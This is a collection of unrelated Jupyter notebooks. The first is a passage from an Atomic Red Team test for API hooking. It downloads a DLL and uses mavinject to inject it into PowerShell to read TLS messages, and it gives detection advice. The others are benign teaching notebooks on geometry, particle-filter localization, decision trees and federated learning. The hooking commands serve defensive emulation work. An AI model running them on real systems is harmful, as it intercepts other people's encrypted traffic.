* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
```
### Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages
Hooks functions in PowerShell to read TLS Communications
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies: Run with `powershell`!
##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll"
```
```
Invoke-AtomicTest T1056.004 -TestNumbers 1 -GetPreReqs
```
#### Attack Commands: Run with `powershell`
```powershell
mavinject $pid /INJECTRUNNING PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
curl https://www.example.com
```
```
Invoke-AtomicTest T1056.004 -TestNumbers 1
```
## Detection
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
|
github_jupyter
|
```
#from lab2.utils import get_random_number_generator
class BoxWindow:
"""[summary]"""
def __init__(self, args):
"""initialize the box window with the bounding points
Args:
args (np.array([integer])): array of the bounding points of the box
"""
self.bounds = args
def __str__(self):
r"""BoxWindow: :math:`[a_1, b_1] \times [a_2, b_2] \times \cdots`
Returns:
str : give the bounds of the box
"""
mot=""
for k in range(len(self.bounds)):
mot = mot+'['+str(self.bounds[k][0])+', '+ str(self.bounds[k][0])+']'
if k != len(self.bounds)-1:
mot=mot+' x '
return ("BoxWindow: " + mot)
def __len__(self):
L=[]
for k in range(len(self.bounds)):
L.append(self.bounds[k][1]-self.bounds[k][0])
return L
def __contains__(self, args):
"""args: coordonnées de point"""
for p in range(len(args)):
if args[p]<self.bounds[p][1] and args[p]>self.bounds[p][0]:
continue
else:
return False
return True
# a=self.bounds[:,0]
# b=self.bounds[:,1]
# return all(np.logical_and(a<= point, point<=b))
def dimension(self):
"""[summary]"""
return (len(self.bounds))
def volume(self):
"""[summary]"""
vol=1
for p in self.__len__():
vol=vol*p
return vol
def indicator_function(self, args):
"""[summary]
Args:
args ([type]): [description]
"""
if self.__contains__(args)==True:
return (1)
else:
return (0)
def rand(self, n=1, rng=None):
"""Generate ``n`` points uniformly at random inside the :py:class:`BoxWindow`.
Args:
n (int, optional): [description]. Defaults to 1.
rng ([type], optional): [description]. Defaults to None.
"""
rng = get_random_number_generator(rng)
L=[]
for p in range(n):
L_petit=[]
for k in range(len(self.bounds)):
if self.bounds[k][0]==self.bounds[k][1]:
L_petit.append(self.bounds[k][0])
else:
L_petit.append(np.random.uniform(self.bounds[k][1]-self.bounds[k][0])+self.bounds[k][0])
L.append(L_petit)
return (L)
#heritage
class UnitBoxWindow(BoxWindow):
def __init__(self, center, dimension):
"""[summary]
Args:
dimension ([type]): [description]
center ([type], optional): [description]. Defaults to None.
"""
super(BoxWindow, self).__init__(args)
import numpy as np
def get_random_number_generator(seed):
"""Turn seed into a np.random.Generator instance."""
return np.random.default_rng(seed)
np.random.uniform(0)
import numpy as np
c=BoxWindow(np.array([[2.5, 2.5]]))
d=BoxWindow(np.array([[0, 5], [-1.45, 3.14], [-10, 10]]))
d.bounds.shape
d.bounds[0][1]
c.rand()
point1=[-1,1,1]
point2=[1,1,1]
d.__contains__(point1)
d.indicator_function(point1)
d.__len__()
d.volume()
d.__str__()
c.__str__()
```
|
github_jupyter
|
# Monte calro localization
Monte calro localizationのサンプルです。
## ライブラリのインポート
```
%matplotlib inline
import math, random # 計算用、乱数の生成用ライブラリ
import matplotlib.pyplot as plt # 描画用ライブラリ
```
## ランドマーククラス
下のグラフに表示されている星たちです。
ロボットはこの星を目印にして自分の位置を知ります。
今回は星の位置もロボットが覚えている設定です。
ロボットがどんな風に星を見ているのかは、観測モデルのクラスを見てください。
```
class Landmarks:
def __init__(self, array):
self.positions = array # array = [[星1のx座標, 星1のy座標], [星2のx座標, 星2のy座標]...]
def draw(self):
# ランドマークの位置を取り出して描画
xs = [e[0] for e in self.positions]
ys = [e[1] for e in self.positions]
plt.scatter(xs,ys,s=300,marker="*",label="landmarks",color="orange")
```
## 移動モデル
fwだけ前に進んで、rotだけ回転します。
ロボットは正確に走らないし、滑ったりもするので、random.gaussによって擬似的に表現します。
実際のロボットでは、試しに動かしてみることで、動きの正確さや傾向を調べておきます。
```
def Movement(pos, fw, rot):
# 移動モデル
# posからfw前進、rot回転した位置をリストで返す
# 雑音の入った前進、回転の動き
actual_fw = random.gauss(fw, fw/10) # 10%の標準偏差でばらつく
actual_rot = random.gauss(rot, rot/10) # 10%の標準偏差でばらつく
dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0) # 3[deg]の標準偏差
# 異動前の位置を保存
px, py, pt = pos
# 移動後の位置を計算
x = px + actual_fw * math.cos(pt + dir_error)
y = py + actual_fw * math.sin(pt + dir_error)
t = pt + dir_error + actual_rot # dir_errorを足す
# 結果を返す
return [x,y,t]
```
## 観測モデル
ランドマーククラスで指定した☆を一個ずつ見ます。
ロボットには自分から見た☆の距離と方向がわかります。
こちらも移動モデル同様に正確には読み取れないので、random.gaussで再現します。
今回のロボットの視野角は180度、距離は1まで見れます。
```
def Observation(pos, landmark):
# 観測モデル
# posから見えるランドマークの距離と方向をリストで返す
obss = []
# センサの計測範囲
# 距離0.1 ~ 1
# 角度90 ~ -90[deg]
sensor_max_range = 1.0
sensor_min_range = 0.1
sensor_max_angle = math.pi / 2
sensor_min_angle = -math.pi / 2
# ロボットやパーティクルの位置姿勢を保存
rx, ry, rt = pos
# ランドマークごとに観測
for lpos in landmark.positions:
true_lx, true_ly = lpos
# 観測が成功したらresultをTrue
result = True
# ロボットとランドマークの距離を計算
# センサの範囲外であればresultがFalseに
distance = math.sqrt((rx - true_lx) ** 2 + (ry - true_ly) ** 2)
if distance > sensor_max_range or distance < sensor_min_range:
result = False
# ロボットから見えるランドマークの方向を計算
# こちらもセンサの範囲外であればresultがFalseに
direction = math.atan2(true_ly - ry, true_lx - rx) - rt
if direction > math.pi: direction -= 2 * math.pi
if direction < - math.pi: direction += 2 * math.pi
if direction > sensor_max_angle or direction < sensor_min_angle:
result = False
# 雑音の大きさを設定
# これは尤度計算に使う正規分布関数の分散になる
sigma_d = distance * 0.1 # 10%の標準偏差
sigma_f = math.pi * 3 / 180 # 3degの標準偏差
# 雑音を混ぜる
d = random.gauss(distance, sigma_d)
f = random.gauss(direction, sigma_f)
# 観測データを保存
z = []
z.append([d, f, sigma_d, sigma_f, result])
return z
```
## パーティクルクラス
下のグラフに描画されますが、青くていっぱいある矢印たちのことです。
ロボットと同様に星を目印にしながら動きますが、重みwを持っていますwww
ロボットと観測結果が似ていると重みの値は大きくなり、大きいほど生き残る確率が高いです。
なので観測がうまくいっていれば、自然とロボットの位置に近いパーティクルたちだけになっていきます。
```
class Particle:
def __init__(self, x, y, t, w):
# パーティクルは位置姿勢と重みを持つ
self.pos = [x, y, t]
self.w = w
class Particles:
# numはパーティクルの個数
def __init__(self, x, y, t, num):
self.particles = []
for i in range(num):
# とりあえず重みはみんな一緒
self.particles.append(Particle(x, y, t, 1.0 / num))
def move(self, fw, rot):
# パーティクルを移動
for i in self.particles:
i.pos = Movement(i.pos, fw, rot)
def observation(self, landmarks):
# パーティクルからの観測データzを保存
for i in self.particles:
i.z = Observation(i.pos, landmarks)
def likelihood(self, robot):
for particle in self.particles:
for i in range(len(particle.z)):
# 各パーティクルの観測データをロボットのものと比較
rd, rf, sigma_rd, sigma_rf, result_r = robot.z[i]
pd, pf, sigma_pd, sigma_pf, result_p = particle.z[i]
# ロボットとパーティクル共にresultがTrueになっていれば計算
if result_r and result_p:
# 尤度計算は正規分布の掛け合わせ
# ロボットと観測データが近いパーティクルは尤度が高くなる
likelihood_d = math.exp(-(rd - pd) ** 2 / (2 * (sigma_rd ** 2))) / (sigma_rd * math.sqrt(2 * math.pi))
likelihood_f = math.exp(-(rf - pf) ** 2 / (2 * (sigma_rf ** 2))) / (sigma_rf * math.sqrt(2 * math.pi))
# 尤度をパーティクルの重みとして保存
particle.w *= likelihood_d * likelihood_f
def resampling(self):
num = len(self.particles)
# 重みリストの作成
ws = [e.w for e in self.particles]
# 重みの大きいパーティクルほど高い確率で選ばれる
ps = random.choices(self.particles, weights = ws, k = num)
# 選ばれたパーティクルの位置、方向を引き継いで、再び均等な重みのパーティクルを作成
self.particles = [Particle(*e.pos, 1.0 / num) for e in ps]
# 矢印の描画に必要な位置と方向を計算して描画
def draw(self, c = "blue", lbl = "particles"):
xs = [p.pos[0] for p in self.particles]
ys = [p.pos[1] for p in self.particles]
vxs = [math.cos(p.pos[2]) for p in self.particles]
vys = [math.sin(p.pos[2]) for p in self.particles]
plt.quiver(xs, ys, vxs, vys, color = c, label = lbl, alpha = 0.7)
```
## ロボットクラス
基本的な構造はパーティクルと変わりません。
わかりやすさのために位置を配列に保存して、軌跡を表示しています。
下のグラフを見るとわかると思います。
```
class Robot:
def __init__(self, x, y, rad):
# ステップごとにロボットの姿勢の真値が入った配列
self.actual_poses = [[x,y,rad]]
def move(self,fw,rot):
# ロボットの位置を記録する(軌跡を残すために配列に入れてる)
self.actual_poses.append(Movement(self.actual_poses[-1], fw, rot))
def observation(self, landmarks):
# 現在地から見た観測データの保存
self.z = Observation(self.actual_poses[-1], landmarks)
# 矢印の描画に必要な位置と方向を計算して描画
def draw(self, sp):
xs = [e[0] for e in self.actual_poses]
ys = [e[1] for e in self.actual_poses]
vxs = [math.cos(e[2]) for e in self.actual_poses]
vys = [math.sin(e[2]) for e in self.actual_poses]
plt.quiver(xs,ys,vxs,vys,color="red",label="actual robot motion")
```
## 描画関数
グラフの大きさなどを設定し、順に描画メソッドを実行させています。
```
def draw(i):
# グラフの設定
fig = plt.figure(i, figsize=(8,8))
sp = fig.add_subplot(111,aspect='equal')
sp.set_xlim(-1.0,1.0)
sp.set_ylim(-0.5,1.5)
# パーティクル、ロボット、ランドマークの描画
particles.draw()
robot.draw(sp)
actual_landmarks.draw()
plt.legend()
```
## シミュレーション開始
ロボット、パーティクル、ランドマークの位置を指定し、シミュレーションを始めます。
```
# ロボット、パーティクル、ランドマークの配置と初期化
robot = Robot(0, 0, 0)
particles = Particles(0, 0, 0, 30)
actual_landmarks = Landmarks([[-0.5,0.0],[0.5,0.0],[0.0,0.5]])
draw(0)
for i in range(1,18):
# ロボットとパーティクルの移動
robot.move(0.2,math.pi / 180.0 * 20)
particles.move(0.2,math.pi / 180.0 * 20)
# ロボットとパーティクルの観測
robot.observation(actual_landmarks)
particles.observation(actual_landmarks)
# 尤度計算
particles.likelihood(robot)
# リサンプリング
particles.resampling()
# 描画
draw(i)
```
|
github_jupyter
|
# Introduction to Data Science
## From correlation to supervised segmentation and tree-structured models
Spring 2018 - Profs. Foster Provost and Josh Attenberg
Teaching Assistant: Apostolos Filippas
***
### Some general imports
```
import os
import numpy as np
import pandas as pd
import math
import matplotlib.pylab as plt
import seaborn as sns
%matplotlib inline
sns.set(style='ticks', palette='Set2')
```
Recall the automobile MPG dataset from last week? Because its familiar, let's reuse it here.
```
url = "http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data-original"
column_names = ['mpg', 'cylinders', 'displacement', 'horsepower', 'weight', 'acceleration',
'model', 'origin', 'car_name']
mpg_df = pd.read_csv(url,
delim_whitespace=True,
header=None,
names=column_names).dropna()
```
Rather than attempt to predict the MPG from the other aspects of a car, let's try a simple classification problem, whether a car gets good milage (high MPG) or not
```
mpg_df["mpg"].hist()
```
Arbitrarily, let's say that those cars with a MPG greater than the median get good miles per gallon.
```
median_mpg = mpg_df["mpg"].median()
print ("the median MPG is: %s" % median_mpg)
def is_high_mpg(mpg):
return 1 if mpg > median_mpg else 0
mpg_df["is_high_mpg"] = mpg_df["mpg"].apply(is_high_mpg)
```
We'd like to use information contained in the other automobile quantities to predict whether or not the car is efficient. Let's take a look at how well these observables "split" our data according to our target.
```
def visualize_split(df, target_column, info_column, color_one="red", color_two="blue"):
plt.rcParams['figure.figsize'] = [15.0, 2.0]
color = ["red" if x == 0 else "blue" for x in df[target_column]]
plt.scatter(df[info_column], df[target_column], c=color, s=50)
plt.xlabel(info_column)
plt.ylabel(target_column)
plt.show()
visualize_split(mpg_df, "is_high_mpg", "weight")
```
Above we see a scatter plot of all possible car weights and a color code that represents our target variable (is good mpg).
- Blue dots correspond to fuel efficient cars, red dots are fuel inefficient cars
- The horizontal position is the weight of the car
- The vertical position separates our two classes
Clearly car weight and high MPG-ness are correlated.
Looks like cars weighing more than 3000 lbs tend to be inefficient. How effective is this decision boundary? Let's quantify it!
***
**Entropy** ($H$) and **information gain** ($IG$) au useful tools for measuring the effectiveness of a split on the data. Entropy measures how random data is, information gain is a measure of the reduction in randomness after performing a split.
<table style="border: 0px">
<tr style="border: 0px">
<td style="border: 0px"><img src="images/dsfb_0304.png" height=80% width=80%>
Figure 3-4. Splitting the "write-off" sample into two segments, based on splitting the Balance attribute (account balance) at 50K.</td>
<td style="border: 0px; width: 30px"></td>
<td style="border: 0px"><img src="images/dsfb_0305.png" height=75% width=75%>
Figure 3-5. A classification tree split on the three-values Residence attribute.</td>
</tr>
</table>
Given the data, it is fairly straight forward to calculate both of these quantities.
##### Functions to get the entropy and IG
```
def entropy(target_column):
"""
computes -sum_i p_i * log_2 (p_i) for each i
"""
# get the counts of each target value
target_counts = target_column.value_counts().astype(float).values
total = target_column.count()
# compute probas
probas = target_counts/total
# p_i * log_2 (p_i)
entropy_components = probas * np.log2(probas)
# return negative sum
return - entropy_components.sum()
def information_gain(df, info_column, target_column, threshold):
"""
computes H(target) - H(target | info > thresh) - H(target | info <= thresh)
"""
data_above_thresh = df[df[info_column] > threshold]
data_below_thresh = df[df[info_column] <= threshold]
H = entropy(df[target_column])
entropy_above = entropy(data_above_thresh[target_column])
entropy_below = entropy(data_below_thresh[target_column])
ct_above = data_above_thresh.shape[0]
ct_below = data_below_thresh.shape[0]
tot = float(df.shape[0])
return H - entropy_above*ct_above/tot - entropy_below*ct_below/tot
```
Now that we have a way of calculating $H$ and $IG$, let's test our prior hunch, that using 3000 as a split on weight allows us to determine if a car is high MPG using $IG$.
```
threshold = 3000
prior_entropy = entropy(mpg_df["is_high_mpg"])
IG = information_gain(mpg_df, "weight", "is_high_mpg", threshold)
print ("IG of %.4f using a threshold of %.2f given a prior entropy of %.4f" % (IG, threshold, prior_entropy))
```
How good was our guess of 3000? Let's loop through all possible splits on weight and see what is the best!
```
def best_threshold(df, info_column, target_column, criteria=information_gain):
maximum_ig = 0
maximum_threshold = 0
for thresh in df[info_column]:
IG = criteria(df, info_column, target_column, thresh)
if IG > maximum_ig:
maximum_ig = IG
maximum_threshold = thresh
return (maximum_threshold, maximum_ig)
maximum_threshold, maximum_ig = best_threshold(mpg_df, "weight", "is_high_mpg")
print ("the maximum IG we can achieve splitting on weight is %.4f using a thresh of %.2f" % (maximum_ig, maximum_threshold))
```
Other observed features may also give us a strong clue about the efficiency of cars.
```
predictor_cols = ['cylinders', 'displacement', 'horsepower', 'weight', 'acceleration', 'model', 'origin']
for col in predictor_cols:
visualize_split(mpg_df, "is_high_mpg", col)
```
This now begs the question: what feature gives the most effective split?
```
def best_split(df, info_columns, target_column, criteria=information_gain):
maximum_ig = 0
maximum_threshold = 0
maximum_column = ""
for info_column in info_columns:
thresh, ig = best_threshold(df, info_column, target_column, criteria)
if ig > maximum_ig:
maximum_ig = ig
maximum_threshold = thresh
maximum_column = info_column
return maximum_column, maximum_threshold, maximum_ig
maximum_column, maximum_threshold, maximum_ig = best_split(mpg_df, predictor_cols, "is_high_mpg")
print ("The best column to split on is %s giving us a IG of %.4f using a thresh of %.2f" % (maximum_column, maximum_ig, maximum_threshold))
```
### The Classifier Tree: Recursive Splitting
Of course, splitting the data one time sometimes isn't enough to make accurate categorical predictions. However, we can continue to split the data recursively until we achieve acceptable results. This recursive splitting is the basis for a "decision tree classifier" or "classifier tree", a popular and powerful class of machine learning algorithm. In particular, this specific algorithm is known as ID3 for Iterative Dichotomizer.
What are some other ways you might consider splitting the data?
```
def Plot_Data(df, info_col_1, info_col_2, target_column, color1="red", color2="blue"):
# Make the plot square
plt.rcParams['figure.figsize'] = [12.0, 8.0]
# Color
color = [color1 if x == 0 else color2 for x in df[target_column]]
# Plot and label
plt.scatter(df[info_col_1], df[info_col_2], c=color, s=50)
plt.xlabel(info_col_1)
plt.ylabel(info_col_2)
plt.xlim([min(df[info_col_1]) , max(df[info_col_1]) ])
plt.ylim([min(df[info_col_2]) , max(df[info_col_2]) ])
plt.show()
plt.figure(figsize=[7,5])
Plot_Data(mpg_df, "acceleration", "weight","is_high_mpg")
```
Rather than build a classifier tree from scratch (think if you could now do this!) let's use sklearn's implementation which includes some additional functionality.
```
from sklearn.tree import DecisionTreeClassifier
# Let's define the model (tree)
decision_tree = DecisionTreeClassifier(max_depth=1, criterion="entropy") # Look at those 2 arguments !!!
# Let's tell the model what is the data
decision_tree.fit(mpg_df[predictor_cols], mpg_df["is_high_mpg"])
```
We now have a classifier tree, let's visualize the results!
```
from IPython.display import Image
from sklearn.tree import export_graphviz
def visualize_tree(decision_tree, feature_names, class_names, directory="./images", name="tree",proportion=True):
# Export our decision tree to graphviz format
dot_name = "%s/%s.dot" % (directory, name)
dot_file = export_graphviz(decision_tree, out_file=dot_name,
feature_names=feature_names, class_names=class_names,proportion=proportion)
# Call graphviz to make an image file from our decision tree
image_name = "%s/%s.png" % (directory, name)
os.system("dot -Tpng %s -o %s" % (dot_name, image_name))
# to get this part to actually work, you may need to open a terminal window in Jupyter and run the following command "sudo apt install graphviz"
# Return the .png image so we can see it
return Image(filename=image_name)
visualize_tree(decision_tree, predictor_cols, ["n", "y"])
```
Let's look at the `"acceleration"`, `"weight"`, including the **DECISION SURFACE!!**
More details for this graph: [sklearn decision surface](http://scikit-learn.org/stable/auto_examples/tree/plot_iris.html)
```
def Decision_Surface(data, col1, col2, target, model, probabilities=False):
# Get bounds
x_min, x_max = data[col1].min(), data[col1].max()
y_min, y_max = data[col2].min(), data[col2].max()
# Create a mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))
meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])
tdf = data[[col1, col2]]
model.fit(tdf, target)
if probabilities:
Z = model.predict(meshed_data).reshape(xx.shape)
else:
Z = model.predict_proba(meshed_data)[:, 1].reshape(xx.shape)
plt.figure(figsize=[12,7])
plt.title("Decision surface")
plt.ylabel(col1)
plt.xlabel(col2)
if probabilities:
# Color-scale on the contour (surface = separator)
cs = plt.contourf(xx, yy, Z,cmap=plt.cm.coolwarm, alpha=0.4)
else:
# Only a curve/line on the contour (surface = separator)
cs = plt.contourf(xx, yy, Z, levels=[-1,0,1],cmap=plt.cm.coolwarm, alpha=0.4)
color = ["blue" if t == 0 else "red" for t in target]
plt.scatter(data[col1], data[col2], color=color )
plt.show()
tree_depth=1
Decision_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["is_high_mpg"], DecisionTreeClassifier(max_depth=tree_depth, criterion="entropy"), True)
```
How good is our model? Let's compute accuracy, the percent of times where we correctly identified that a car was high MPG.
```
from sklearn import metrics
print ( "Accuracy = %.3f" % (metrics.accuracy_score(decision_tree.predict(mpg_df[predictor_cols]), mpg_df["is_high_mpg"])) )
```
What are some other ways we could classify the data? Last class we used linear regression, let's take a look to see how that partitions the data
```
from sklearn import linear_model
import warnings
warnings.filterwarnings('ignore')
Decision_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["is_high_mpg"], linear_model.Lasso(alpha=0.01), True)
```
## Decision Tree Regression
Recall our problem from last time, trying to predict the real-valued MPG for each car. In data science, problems where one tries to predict a real-valued number is known as regression. As with classification, much of the intuition for splitting data based on values of known observables applies:
```
from mpl_toolkits.mplot3d import Axes3D
def plot_regression_data(df, info_col_1, info_col_2, target_column):
# Make the plot square
plt.rcParams['figure.figsize'] = [12.0, 8.0]
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_trisurf(df[info_col_1], df[info_col_2], df[target_column], cmap=plt.cm.viridis, linewidth=0.2)
ax.set_xlabel(info_col_1)
ax.set_ylabel(info_col_2)
ax.set_zlabel(target_column);
ax.view_init(60, 45)
plt.show()
plot_regression_data(mpg_df, "acceleration", "weight", "mpg")
```
At a high level, one could imagine splitting the data recursively, assigning an estimated MPG to each side of the split. On more thoughtful reflection, some questions emerge:
- how do predict a real number at a leaf node given the examples that "filter" to that node?
- how do we assess the effectiveness of a particular split?
As with decision tree classification, there are many valid answers to both of these questions. A typical approach involves collecting all nodes that filter to a leaf, computing the mean target value, and using this as a prediction. The effectiveness of a split can then be measured by computing the mean difference between all true values and this prediction.
As before, we can easily experiment with decison tree regression models using sklearn:
```
from sklearn.tree import DecisionTreeRegressor
regressor = DecisionTreeRegressor(max_depth=1, criterion="mse") # note the use of mse (mean squared error) as a criterion
regressor.fit(mpg_df[predictor_cols], mpg_df["mpg"])
visualize_tree(regressor, predictor_cols, ["n", "y"])
```
As before, we can also view the "regression surface"
```
def Regression_Surface(data, col1, col2, target, model):
# Get bounds
x_min, x_max = data[col1].min(), data[col1].max()
y_min, y_max = data[col2].min(), data[col2].max()
# Create a mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))
meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])
tdf = data[[col1, col2]]
model.fit(tdf, target)
Z = model.predict(meshed_data).reshape(xx.shape)
plt.figure(figsize=[12,7])
plt.title("Decision surface")
plt.ylabel(col1)
plt.xlabel(col2)
cs = plt.contourf(xx, yy, Z, alpha=0.4, cmap=plt.cm.coolwarm)
plt.scatter(data[col1], data[col2], c=target, cmap=plt.cm.coolwarm)
plt.show()
tree_depth=1
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], DecisionTreeRegressor(max_depth=tree_depth, criterion="mse"))
```
Let's also take a look using linear regression!
```
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], linear_model.LinearRegression())
```
How about a more complicated model? Let's try random forrest regression!
```
from sklearn.ensemble import RandomForestRegressor
Regression_Surface(mpg_df[predictor_cols], "acceleration", "weight", mpg_df["mpg"], RandomForestRegressor(n_estimators=10))
```
|
github_jupyter
|
# Syft Duet for Federated Learning - Central Aggregator
## Setup
First we need to install syft 0.3.0 because for every other syft project in this repo we have used syft 0.2.9. However, a recent update has removed a lot of the old features and replaced them with this new 'Duet' function. To do this go into your terminal and cd into the repo directory and run:
> pip uninstall syft
Then confirm with 'y' and hit enter.
> pip install syft==0.3.0
NOTE: Make sure that you uninstall syft 0.3.0 and reinstall syft 0.2.9 if you want to run any of the other projects in this repo. Unfortunately when PySyft updated from 0.2.9 to 0.3.0 it removed all of the previous functionalities for the FL, DP, and HE that have previously been iplemented.
```
# Double check you are using syft 0.3.0 not 0.2.9
# !pip show syft
import syft as sy
import pandas as pd
import torch
```
## Initialising the Duets
```
portuguese_bank_duet = sy.duet("317e830fd06779d42237bcee6483427b")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first bank is connected before attempting the connect to the second bank.
```
american_bank_duet = sy.duet("d9de11127f79d32c62aa0566d5807342")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. Ensure the first and second banks are connected before attempting the connect to the third bank.
```
australian_bank_duet = sy.duet("a33531fab99dc31aa53c97e3166b5922")
```
>If the connection is established then there should be a green message above saying 'CONNECTED!'. This should mean that you have connected three seperate duets to three different 'banks' around the world!
## Check the data exists in each duet
```
portuguese_bank_duet.store.pandas
american_bank_duet.store.pandas
australian_bank_duet.store.pandas
```
>As a proof of concept for the security of this federated learning method. If you wanted to see/access the data from this side of the connection you can't without permission. To try thi run;
```python
name_bank_duet.store["tag"].get()
```
>Where you replace 'name' with the specific banks name and the 'tag' with the data tag. This should through a permissions error and recommend that you request the data from that 'bank'. From here you should run;
```python
name_bank_duet.store["tag"].request()
# Or
name_bank_duet.store["tag"].get(request_block=True)
```
>Now you have sent a request to the 'bank' side of the connection - now you must wait until on their end they see this requesnt and type the code;
```python
duet.requests[0].accept()
```
>Once they accept the request, you can freely get the data on this end - however, for federated learning this should never be explicityl done on data. Only results of computation.
## Import Test data
```
test_data = pd.read_csv('datasets/test-data.csv', sep = ',')
test_target = pd.read_csv('datasets/test-target.csv', sep = ',')
test_data.head()
test_data = torch.tensor(test_data.values).float()
test_data
test_target = torch.tensor(test_target.values).float()
test_target
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
test_data = sc_X.fit_transform(test_data)
test_data = torch.tensor(test_data).float()
test_data
```
## Initialise the local Model
```
class LR(sy.Module):
def __init__(self, n_features, torch_ref):
super(LR, self).__init__(torch_ref=torch_ref)
self.lr = torch_ref.nn.Linear(n_features, 1)
def forward(self, x):
out = self.torch_ref.sigmoid(self.lr(x))
return out
local_model = LR(test_data.shape[1], torch)
```
## Send the Model to each connection
```
portuguese_bank_model = local_model.send(portuguese_bank_duet)
american_bank_model = local_model.send(american_bank_duet)
australian_bank_model = local_model.send(australian_bank_duet)
```
### Get the parameters for each model
```
portuguese_bank_parameters = portuguese_bank_model.parameters()
american_bank_parameters = american_bank_model.parameters()
australian_bank_parameters = australian_bank_model.parameters()
```
## Create Local torch of the connections 'remote' torch
```
portuguese_bank_remote_torch = portuguese_bank_duet.torch
american_bank_remote_torch = american_bank_duet.torch
australian_bank_remote_torch = australian_bank_duet.torch
```
### Define each banks optimiser with 'remote' torchs
```
portuguese_bank_optimiser = portuguese_bank_remote_torch.optim.SGD(portuguese_bank_parameters, lr=1)
american_bank_optimiser = american_bank_remote_torch.optim.SGD(american_bank_parameters, lr=1)
australian_bank_optimiser = australian_bank_remote_torch.optim.SGD(australian_bank_parameters, lr=1)
```
### Finally, define the loss criterion for each
```
portuguese_bank_criterion = portuguese_bank_remote_torch.nn.BCELoss()
american_bank_criterion = american_bank_remote_torch.nn.BCELoss()
australian_bank_criterion = australian_bank_remote_torch.nn.BCELoss()
criterions = [portuguese_bank_criterion, american_bank_criterion, australian_bank_criterion]
```
## Train the Models
```
EPOCHS = 25
def train(criterion, epochs=EPOCHS):
for e in range(1, epochs + 1):
# Train Portuguese Bank's Model
portuguese_bank_model.train()
portuguese_bank_optimiser.zero_grad()
portuguese_bank_pred = portuguese_bank_model(portuguese_bank_duet.store[0])
portuguese_bank_loss = criterion[0](portuguese_bank_pred, portuguese_bank_duet.store[1])
portuguese_bank_loss.backward()
portuguese_bank_optimiser.step()
local_portuguese_bank_loss = None
local_portuguese_bank_loss = portuguese_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_portuguese_bank_loss is not None:
print("Epoch {}:".format(e))
print("Portuguese Bank Loss: {:.4}".format(local_portuguese_bank_loss))
else:
print("Epoch {}:".format(e))
print("Portuguese Bank Loss: HIDDEN")
# Train American Bank's Model
american_bank_model.train()
american_bank_optimiser.zero_grad()
american_bank_pred = american_bank_model(american_bank_duet.store[0])
american_bank_loss = criterion[1](american_bank_pred, american_bank_duet.store[1])
american_bank_loss.backward()
american_bank_optimiser.step()
local_american_bank_loss = None
local_american_bank_loss = american_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_american_bank_loss is not None:
print("American Bank Loss: {:.4}".format(local_american_bank_loss))
else:
print("American Bank Loss: HIDDEN")
# Train Australian Bank's Model
australian_bank_model.train()
australian_bank_optimiser.zero_grad()
australian_bank_pred = australian_bank_model(australian_bank_duet.store[0])
australian_bank_loss = criterion[2](australian_bank_pred, australian_bank_duet.store[1])
australian_bank_loss.backward()
australian_bank_optimiser.step()
local_australian_bank_loss = None
local_australian_bank_loss = australian_bank_loss.get(
name="loss",
reason="To evaluate training progress",
request_block=True,
timeout_secs=5
)
if local_australian_bank_loss is not None:
print("Australian Bank Loss: {:.4}".format(local_australian_bank_loss))
else:
print("Australian Bank Loss: HIDDEN")
return ([portuguese_bank_model, american_bank_model, australian_bank_model])
models = train(criterions)
```
## Localise the models again
```
# As you can see they are all still remote
models
local_portuguese_bank_model = models[0].get(
request_block=True,
name="model_download",
reason="test evaluation",
